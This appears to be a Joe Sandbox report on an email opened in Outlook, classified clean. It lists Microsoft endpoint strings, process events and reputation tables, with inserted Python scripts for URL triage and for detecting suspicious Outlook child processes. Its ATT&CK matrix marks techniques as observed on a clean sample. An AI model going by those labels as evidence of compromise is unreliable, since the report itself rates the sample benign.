Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://powerlift.acompli.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://pushchannel.1drv.ms
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://res.cdn.office.net
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://res.cdn.office.net/polymer/models
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://safelinks.protection.outlook.com/api/GetPolicy
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://service.officepy.microsoftusercontent.com/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://service.powerapps.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://settings.outlook.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://shell.suite.office.com:1443
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://skyapi.live.net/Activity/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://staging.cortana.ai
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://store.office.cn/addinstemplate
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://store.office.de/addinstemplate
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://substrate.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://tasks.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://templatesmetadata.office.net/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://useraudit.o365auditrealtimeingestion.manage.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr, String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://webshell.suite.office.com
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscovery.ashx
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://wus2.contentsync.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://www.yammer.com
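The URL strings listed above are the Microsoft 365 client endpoints an Office binary carries, so the practical question when triaging a report like this one is whether anything in the list falls outside the expected first-party domains. The Python script below is an added example, not part of the Joe Sandbox report: it parses lines in the report's "String found in binary or memory" format, extracts the host of each URL, and partitions hosts into an illustrative first-party suffix list versus everything else. Truncated strings such as https://wus2.contentsync. end in a dot and carry no complete hostname, so they are kept aside as fragments rather than silently matched. The suffix list, the sample lines and the example-cdn.invalid entry are constructed for the example.

```python
"""Added triage helper for the 'String found in binary or memory' lines of a
Joe Sandbox report. It is not part of the report or of Joe Sandbox."""
import re
from urllib.parse import urlsplit

# Constructed sample in the shape the report uses (artefact name fused to the
# finding text, exactly as extracted). The last line is an invented outlier.
SAMPLE_LINES = [
    "Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory",
    "Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://shell.suite.office.com:1443",
    "Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://wus2.contentsync.",
    "Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://www.yammer.com",
    "Source: E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drString found in binary or memory: https://example-cdn.invalid/payload",
]

# Assumption: an illustrative allowlist of suffixes Microsoft 365 clients are
# expected to reach. It is not a vendor-published list; extend it per tenant.
FIRST_PARTY_SUFFIXES = (
    "office.com", "office.net", "office365.com", "microsoft.com", "live.com",
    "live.net", "outlook.com", "onenote.com", "yammer.com", "1drv.ms", "svc.ms",
    "windows.net", "getmicrosoftkey.com", "cloud.microsoft", "static.microsoft",
    "acompli.net", "bingapis.com", "msn.com",
)

_FINDING_RE = re.compile(r"String found in binary or memory:\s*(\S+)")


def extract_url(line):
    """Return the URL from a report line, or None if the line is not a URL finding."""
    match = _FINDING_RE.search(line)
    return match.group(1) if match else None


def host_of(url):
    """Return the lowercase host, or None when the string has no complete host.
    Truncated strings such as 'https://wus2.contentsync.' end in a dot and
    cannot be matched against a suffix list."""
    host = urlsplit(url).hostname
    if not host or host.endswith("."):
        return None
    return host.lower()


def is_first_party(host):
    """True when the host equals, or is a subdomain of, an allowlisted suffix."""
    return any(host == s or host.endswith("." + s) for s in FIRST_PARTY_SUFFIXES)


def triage(lines):
    """Split the hosts found in report lines into (first_party, other, fragments),
    each a sorted list without duplicates; 'fragments' keeps raw incomplete URLs."""
    first_party, other, fragments = set(), set(), set()
    for line in lines:
        url = extract_url(line)
        if url is None:
            continue
        host = host_of(url)
        if host is None:
            fragments.add(url)
        elif is_first_party(host):
            first_party.add(host)
        else:
            other.add(host)
    return sorted(first_party), sorted(other), sorted(fragments)


if __name__ == "__main__":
    known, unknown, partial = triage(SAMPLE_LINES)
    print("first-party hosts:", known)
    print("hosts to review:  ", unknown)
    print("incomplete URLs:  ", partial)
```

Running it against the full report is a matter of feeding every "String found in binary or memory" line to triage(); on a clean Office sample the "other" bucket should be empty, and anything that lands there is the line worth reading first.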
Source: classification engine | Classification label: clean1.winEML@3/11@0/0
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241013T2236000523-7832.etl
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\9ba54f65-7bc2-d549-b688-53131649ef52.eml"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D675929E-58F5-446D-A282-324992C7C8DE" "6968D5F9-FDC3-4959-BF37-5B5D02ACDBD9" "7832" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Window found: window name: SysTabControl32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process information set: NOOPENFILEERRORBOX (50 further occurrences)
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File Volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
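The process tree recorded above (OUTLOOK.EXE started with /eml, then ai.exe launched from inside the Office installation root) is the benign shape this kind of report normally shows, and the useful detection question is not whether Outlook spawned a child but where the child's image lives. The Python rule below is an added example, not part of the report or of Joe Sandbox: it classifies process-creation events whose parent is OUTLOOK.EXE by the child's image path. The first sample event reproduces the parent/child pair from this report; the other two events, the Office root prefixes and the user-writable prefixes are constructed assumptions.

```python
"""Added detection check for children of OUTLOOK.EXE, modelled on the process
tree in this report. Not part of the report or of Joe Sandbox."""


def _norm(path):
    """Lower-case a Windows path and unify separators so prefix checks are stable."""
    return path.replace("/", "\\").lower()


# Assumption: Click-to-Run Office installs its binaries below one of these roots
# (the report's own paths sit under the first one).
OFFICE_ROOTS = tuple(_norm(p) + "\\" for p in (
    r"C:\Program Files (x86)\Microsoft Office\root",
    r"C:\Program Files\Microsoft Office\root",
))

# Assumption: locations a standard user can write to; a child of Outlook running
# from here is worth a look regardless of its name.
USER_WRITABLE = tuple(_norm(p) + "\\" for p in (
    r"C:\Users", r"C:\ProgramData", r"C:\Windows\Temp",
))

SAMPLE_EVENTS = [
    # Parent/child pair taken from this report's process tree.
    {"parent_image": r"C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe"},
    # Constructed counter-example: same parent, child in a user-writable path.
    {"parent_image": r"C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Users\user\AppData\Local\Temp\helper.exe"},
    # Constructed: parent is not Outlook, so the rule does not apply.
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\user\AppData\Local\Temp\helper.exe"},
]


def classify_outlook_child(event):
    """Return None when the parent is not OUTLOOK.EXE, otherwise 'expected'
    (child inside the Office root), 'suspicious' (child in a user-writable
    location) or 'review' (anywhere else, e.g. another installed product)."""
    parent = _norm(event["parent_image"])
    image = _norm(event["image"])
    if not parent.endswith("\\outlook.exe"):
        return None
    if image.startswith(OFFICE_ROOTS):
        return "expected"
    if image.startswith(USER_WRITABLE):
        return "suspicious"
    return "review"


def triage_events(events):
    """Apply the rule to a batch of events; drop the ones it does not apply to."""
    results = []
    for event in events:
        verdict = classify_outlook_child(event)
        if verdict is not None:
            results.append((event["image"], verdict))
    return results


if __name__ == "__main__":
    for image, verdict in triage_events(SAMPLE_EVENTS):
        print(f"{verdict:10s} {image}")
```

The rule deliberately keys on the parent's file name and the child's directory rather than on the child's name, because a renamed binary in a temp directory is exactly what a name-based allowlist would miss; the "review" bucket catches children of Outlook that sit in neither list, such as other installed products, so they can be allowlisted explicitly instead of being ignored.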
MITRE ATT&CK Matrix (a leading number marks a technique observed for this sample, with its hit count; unnumbered cells are the matrix's default entries)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Process Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact

Observed techniques: DLL Side-Loading (1, listed under Persistence, Privilege Escalation and Defense Evasion), Process Injection (1, Privilege Escalation and Defense Evasion), Masquerading (1), Process Discovery (1), System Information Discovery (13).
Behavior Graph (ID: 1532881; Sample: 9ba54f65-7bc2-d549-b688-531...; Start date: 14/10/2024; Architecture: WINDOWS; Score: 1)
  start -> OUTLOOK.EXE (node counters 49, 93) -> started ai.exe

No Antivirus matches
Source | Detection | Scanner | Label
https://api.diagnosticssdf.office.com | 0% | URL Reputation | safe
https://api.diagnosticssdf.office.com | 0% | URL Reputation | safe
https://login.microsoftonline.com/ | 0% | URL Reputation | safe
https://shell.suite.office.com:1443 | 0% | URL Reputation | safe
https://designerapp.azurewebsites.net | 0% | URL Reputation | safe
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | 0% | URL Reputation | safe
https://autodiscover-s.outlook.com/ | 0% | URL Reputation | safe
https://useraudit.o365auditrealtimeingestion.manage.office.com | 0% | URL Reputation | safe
https://outlook.office365.com/connectors | 0% | URL Reputation | safe
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | 0% | URL Reputation | safe
https://cdn.entity. | 0% | URL Reputation | safe
https://api.addins.omex.office.net/appinfo/query | 0% | URL Reputation | safe
https://clients.config.office.net/user/v1.0/tenantassociationkey | 0% | URL Reputation | safe
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://lookup.onenote.com/lookup/geolocation/v1 | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 0% | URL Reputation | safe
https://api.powerbi.com/v1.0/myorg/imports | 0% | URL Reputation | safe
https://cloudfiles.onenote.com/upload.aspx | 0% | URL Reputation | safe
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
https://entitlement.diagnosticssdf.office.com | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe
https://canary.designerapp. | 0% | URL Reputation | safe
https://ic3.teams.office.com | 0% | URL Reputation | safe
https://www.yammer.com | 0% | URL Reputation | safe
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | 0% | URL Reputation | safe
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | 0% | URL Reputation | safe
https://cr.office.com | 0% | URL Reputation | safe
https://messagebroker.mobile.m365.svc.cloud.microsoft | 0% | URL Reputation | safe
https://portal.office.com/account/?ref=ClientMeControl | 0% | URL Reputation | safe
https://clients.config.office.net/c2r/v1.0/DeltaAdvisory | 0% | URL Reputation | safe
https://edge.skype.com/registrar/prod | 0% | URL Reputation | safe
https://graph.ppe.windows.net | 0% | URL Reputation | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://tasks.office.com | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | 0% | URL Reputation | safe
https://api.scheduler. | 0% | URL Reputation | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
https://api.aadrm.com | 0% | URL Reputation | safe
https://edge.skype.com/rps | 0% | URL Reputation | safe
https://globaldisco.crm.dynamics.com | 0% | URL Reputation | safe
https://messaging.engagement.office.com/ | 0% | URL Reputation | safe
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://api.diagnosticssdf.office.com/v2/feedback | 0% | URL Reputation | safe
https://api.powerbi.com/v1.0/myorg/groups | 0% | URL Reputation | safe
https://web.microsoftstream.com/video/ | 0% | URL Reputation | safe
https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://graph.windows.net | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://analysis.windows.net/powerbi/api | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://substrate.office.com | 0% | URL Reputation | safe
https://outlook.office365.com/autodiscover/autodiscover.json | 0% | URL Reputation | safe
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | 0% | URL Reputation | safe
https://consent.config.office.com/consentcheckin/v1.0/consents | 0% | URL Reputation | safe
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 0% | URL Reputation | safe
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices | 0% | URL Reputation | safe
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | 0% | URL Reputation | safe
https://safelinks.protection.outlook.com/api/GetPolicy | 0% | URL Reputation | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | 0% | URL Reputation | safe
http://weather.service.msn.com/data.aspx | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://officepyservice.office.net/service.functionality | 0% | URL Reputation | safe
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | 0% | URL Reputation | safe
https://templatesmetadata.office.net/ | 0% | URL Reputation | safe
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | 0% | URL Reputation | safe
https://messaging.lifecycle.office.com/ | 0% | URL Reputation | safe
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | 0% | URL Reputation | safe
https://mss.office.com | 0% | URL Reputation | safe
https://pushchannel.1drv.ms | 0% | URL Reputation | safe
https://management.azure.com | 0% | URL Reputation | safe
https://outlook.office365.com | 0% | URL Reputation | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
https://incidents.diagnostics.office.com | 0% | URL Reputation | safe
https://clients.config.office.net/user/v1.0/ios | 0% | URL Reputation | safe
https://make.powerautomate.com | 0% | URL Reputation | safe
https://api.addins.omex.office.net/api/addins/search | 0% | URL Reputation | safe
https://insertmedia.bing.office.net/odc/insertmedia | 0% | URL Reputation | safe
https://outlook.office365.com/api/v1.0/me/Activities | 0% | URL Reputation | safe
https://api.office.net | 0% | URL Reputation | safe
https://incidents.diagnosticssdf.office.com | 0% | URL Reputation | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe
https://clients.config.office.net/user/v1.0/android/policies | 0% | URL Reputation | safe
https://entitlement.diagnostics.office.com | 0% | URL Reputation | safe
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | 0% | URL Reputation | safe
https://my.microsoftpersonalcontent.com | 0% | Virustotal |
https://outlook.office.com/autosuggest/api/v1/init?cvid= | 0% | Virustotal |
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | 1% | Virustotal |
https://d.docs.live.net | 0% | Virustotal |
https://api.microsoftstream.com/api/ | 0% | Virustotal |
https://otelrules.svc.static.microsoft | 0% | Virustotal |
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe; URL Reputation: safe | unknown
https://login.microsoftonline.com/ | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://shell.suite.office.com:1443 | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://designerapp.azurewebsites.net | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://autodiscover-s.outlook.com/ | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://useraudit.o365auditrealtimeingestion.manage.office.com | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://outlook.office365.com/connectors | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://cdn.entity. | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://powerlift.acompli.net | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://cortana.ai | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/imports | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://cloudfiles.onenote.com/upload.aspx | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://entitlement.diagnosticssdf.office.com | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://api.aadrm.com/ | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://canary.designerapp. | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://ic3.teams.office.com | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://www.yammer.com | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://api.microsoftstream.com/api/ | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | | unknown
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://cr.office.com | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | | unknown
https://messagebroker.mobile.m365.svc.cloud.microsoft | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://otelrules.svc.static.microsoft | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | | unknown
